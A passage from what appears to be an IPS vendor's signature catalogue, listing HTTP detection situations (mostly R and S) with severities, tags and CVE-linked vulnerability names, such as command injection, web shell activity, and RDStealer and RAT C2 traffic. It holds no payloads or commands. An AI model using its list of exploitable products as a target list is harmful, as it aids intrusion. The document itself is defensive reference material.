Tags: Windows, x86, PY Software Active Webcam Webserver, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Py-Software-Active-Webcam-Webserver-Floppy-DoS
Description:
Back to top

HTTP_CSU-PyTorch-Model-Server-Registration-And-Deserialization-RCE

About this situation: An attempt to exploit a vulnerability in PyTorch detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PyTorch, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: PyTorch-Model-Server-Registration-And-Deserialization-RCE
Description:
Back to top

HTTP_CSU-Qlik-Sense-Path-Traversal-CVE-2023-41266

About this situation: An attempt to exploit a vulnerability in Qlik Sense detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Qlik Sense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1660-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Qlik-Sense-Path-Traversal-CVE-2023-41266
Description:
Back to top

HTTP_CSU-Quest-Kace-Systems-Management-Command-Injection

About this situation: An attempt to exploit a vulnerability in Quest KACE Systems Management detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Quest Software KACE Systems Management, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: Quest-Kace-Systems-Management-Command-Injection
Description:
Back to top

HTTP_CSU-Raptor-Train-Malware-Activity

About this situation: An attempt to exploit a vulnerability in Raptor Train detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Raptor Train Malware, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Vulnerability: Raptor-Train-Malware-Activity
Description:
Back to top

HTTP_CSU-Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019

About this situation: An attempt to exploit a vulnerability in Ray OS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ray OS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019
Description:
Back to top

HTTP_CSU-RDStealer-Malware-C2-Traffic

About this situation: Command-and-control traffic by RDStealer malware detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, RDStealer Malware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: RDStealer-Malware-C2-Traffic
Description:
Back to top

HTTP_CSU-Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss Seam detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-563-5211
Vulnerability: Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure
Description:
Back to top

HTTP_CSU-Redhat-Apache-Cachemgr-Cgi

About this situation: Access to vulnerable script
Context: HTTP Request URI
Severity: 2
Tags: Red Hat Linux 6, Any Hardware, Apache, CVE1999, Apache not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: Red-Hat-Cachemgr-Cgi-Script
Description:
Back to top

HTTP_CSU-Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Auth-Bypass

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss Enterprise Application Platform detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943

About this situation: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Rejetto HttpFileServer, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
Description:
Back to top

HTTP_CSU-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943

About this situation: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Rejetto HttpFileServer, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
Description:
Back to top

HTTP_CSU-Rejetto-HttpFileServer-Remote-Command-Execution

About this situation: An attempt to exploit a Rejetto HttpFileServer Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Rejetto HttpFileServer, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Rejetto-HttpFileServer-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments

About this situation: An attempt to exploit a vulnerability via CGI batch arguments detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Apache Tomcat, CVE2000, CVE2019, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Web-Oracle-Batch-File-Cmd-Exec
Apache-Tomcat-CGIServlet-enableCmdLineArguments-RCE
Description:
Back to top

HTTP_CSU-Response-Splitting

About this situation: HTTP response splitting attempt detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Generic HTTP server, Generic proxy, Any Operating System not specific, Generic HTTP client not specific, Generic HTTP server not specific, Generic proxy not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP_Response_Splitting
Description:
Back to top

HTTP_CSU-ReverseRAT-Infection-Traffic

About this situation: ReverseRAT infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: ReverseRAT-Infection-Traffic
Description:
Back to top

HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content

About this situation: RichFaces framework DATA URL segment followed by compressed content
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, RichFaces framework, CVE2018, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: RichFaces-Framework-Expression-Language-Injection-CVE-2018-14667
RichFaces-Framework-Expression-Language-Injection-CVE-2018-12533
Description:
Back to top

HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload

About this situation: An attempt to exploit a vulnerability in RichFaces framework detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, RichFaces framework, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: RichFaces-Framework-Expression-Language-Injection-CVE-2018-14667
RichFaces-Framework-Expression-Language-Injection-CVE-2018-12533
Description:
Back to top

HTTP_CSU-RIG-EK-Traffic-Pattern

About this situation: Traffic resembling RIG Exploit Kit was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: HTTP_CSU-RIG-EK-Traffic-Pattern
Description:
Back to top

HTTP_CSU-Roads-File-Disclosure

About this situation: Roads search.pl file disclosure
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Martin Hamilton ROADS, CVE2001, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Roads-File-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-Robots.txt-File-Access

About this situation: Robots.txt file access was detected
Context: HTTP Request URI
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

HTTP_CSU-Rockwell-Automation-Factorytalk-SE-RCE

About this situation: An attempt to exploit a vulnerability in Rockwell FactoryTalk View SE detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell FactoryTalk View SE, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Vulnerability: Rockwell-Automation-Factorytalk-SE-RCE
Description:
Back to top

HTTP_CSU-Roundcube-Webmail-SQL-Injection-CVE-2021-44026

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Vulnerability: Roundcube-Webmail-SQL-Injection-CVE-2021-44026
Description:
Back to top

HTTP_CSU-RSA-Authentication-Web-Agent-Request

About this situation: Detects the usage of RSA Security RSA Authentication Agent For Web for IIS
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, RSA Security RSA Authentication for Web for IIS, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: RSA-Authentication-Web-Agent-Request
Description:
Back to top

HTTP_CSU-Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717

About this situation: An attempt to exploit a vulnerability in Ruckus Wireless Admin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ruckus Wireless Admin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Vulnerability: Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717
Description:
Back to top

HTTP_CSU-Saefko-RAT-C2-Traffic

About this situation: Saefko RAT C2 traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: Saefko-RAT-C2-Traffic
Description:
Back to top

HTTP_CSU-Sagem-Fast-3304-V1-Denial-Of-Service

About this situation: Sagem Fast 3304-V1 Denial Of Service Vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAGEM 3304, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Sagem-Fast-3304-V1-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Sambar-Search-DLL-Directory-Listing-Disclosure

About this situation: Sambar search.dll directory disclosure
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Sambar Server, CVE2000, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Sambar-Search-DLL-Directory-Disclosure
Description:
Back to top

HTTP_CSU-Sample-Cgi-Jj-Access

About this situation: Access to vulnerable script
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE1999, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Cgi-Jj-Sys-Compromise
Description:
Back to top

HTTP_CSU-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a buffer overflow in SAP DB Web Server was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, SAP DB, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1636-5242
Vulnerability: HTTP-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTP_CSU-SAP-Messenger-Web-Server-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a buffer overflow in SAP Messenger Web Server was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, SAP, CVE2007, Windows not specific, SAP not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-665-5211
Vulnerability: HTTP-SAP-Message-Srv-Server-Group-Parameter-BOF
Description:
Back to top

HTTP_CSU-SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637
Description:
Back to top

HTTP_CSU-SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163
Description:
Back to top

HTTP_CSU-SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, SAP NetWeaver, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-SAP-Netweaver-Suspicious-Probe-Request

About this situation: An attempt to exploit a vulnerability in SAP Netweaver
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, Any Operating System not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: SAP-Netweaver-Suspicious-Probe-Request
Description:
Back to top

HTTP_CSU-SAP-Netweaver-Visual-Composer-CVE-2025-31324-WebShell-Activity

About this situation: An attempt to interact with a web shell detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 1st Most Recent Update, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1873-5242
Last changed: sgpkg-ips-1873-5242
Vulnerability: SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
Description:
Back to top

HTTP_CSU-Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric IIoT Monitor detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal
Description:
Back to top

HTTP_CSU-Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Schneider Electric ClearSCADA 2010 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ClearSCADA, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Script-Tag-In-URI

About this situation: A script tag was found in an URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-11, CVE2007, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Apache-Mod-Imagemap-Module-Cross-Site-Scripting
HTTP-Possible-Cross-Site-Scripting
MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908
Description:
Back to top

HTTP_CSU-Serendipity-Exit-Php-SQL-Injection

About this situation: Serendipity Exit.php SQL injection vulnerability
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, S9Y Serendipity, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-404-4219
Vulnerability: HTTP-Serendipity-Exit-Php-SQL-Injection
Description:
Back to top

HTTP_CSU-Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210
Description:
Back to top

HTTP_CSU-Server-Side-Scripting-Suspicious-External-Parameter-Reference

About this situation: Detected a suspicious use of a external URI reference in a parameter to a web page
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-227-3038
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Server-Side-Scripting-Suspicious-External-Text-File-Reference

About this situation: Detected a suspicious use of a external URI reference in a parameter to a web page
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-228-3038
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

About this situation: An attempt to exploit a vulnerability in ServiceNow detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ServiceNow, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1819-5242
Vulnerability: ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
ServiceNow-Now-Platform-Template-Injection-CVE-2024-5217
ServiceNow-Now-Platform-Sensitive-File-Read-CVE-2024-5178
Description:
Back to top

HTTP_CSU-Shared-Variables

About this situation: Fingerprints that set variables shared between multiple fingerprints
Context: HTTP Request URI
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic, 1st Most Recent Update, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1873-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_CSU-Shlayer-Trojan-Infection-Traffic

About this situation: Shlayer trojan infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Mac OS, Any Hardware, Mac OS not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Shlayer-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CSU-SideWinder-APT-C2-Traffic

About this situation: SideWinder APT C2 traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: SideWinder-APT-C2-Traffic
Description:
Back to top

HTTP_CSU-Siemens-Gigaset-se551-Authorization-Bypass

About this situation: An attempt to disclose sensitive information in Siemens Gigaset se551 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Gigaset se551, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Siemens-Gigaset-se551-Authorization-Bypass
Description:
Back to top

HTTP_CSU-Siemens-Gigaset-se551-Restart-Attempt

About this situation: An attempt to restart Siemens Gigaset se551 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Gigaset se551, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Siemens-Gigaset-se551-Authorization-Bypass
Description:
Back to top

HTTP_CSU-Siemens-WinCC-MiniWeb-Denial-Of-Service

About this situation: Siemens WinCC flixible runtime 2008 SP2 + SP 1, miniweb.exe Denial of Service
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MiniWeb, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Siemens-WinCC-MiniWeb-Denial-Of-Service
Description:
Back to top

HTTP_CSU-SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727

About this situation: An attempt to exploit a vulnerability in SimpleHelp Remote Support detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SimpleHelp Remote Support, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727
Description:
Back to top

HTTP_CSU-Sitecore-XP-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Sitecore XP detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Sitecore XP, CVE2021, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Sitecore-XP-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-SixApart-Movable-Type-Code-Execution

About this situation: An attempt to exploit a SixApart Movable Type Code Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Movable Type, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: SixApart-Movable-Type-Code-Execution
Description:
Back to top

HTTP_CSU-Skywiper-B-Trojan-Activity-Detected

About this situation: Skywiper.B Trojan activity detected
Context: HTTP Request URI
Severity: 7
